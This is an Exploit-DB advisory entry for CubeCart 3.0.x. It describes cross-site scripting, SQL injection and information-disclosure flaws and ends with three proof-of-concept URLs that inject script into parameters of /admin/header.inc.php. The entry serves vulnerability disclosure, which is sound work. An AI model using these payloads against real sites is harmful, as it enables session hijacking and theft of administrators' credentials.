CubeCart 3.0.x - '/admin/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

28703




Platform:

PHP

Date:

2006-09-26


source: https://www.securityfocus.com/bid/20215/info
       
CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 
       
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
      
http://www.example.com/admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
http://www.example.com/admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
http://www.example.com/admin/header.inc.php?charset='><script>alert(document.cookie);</script>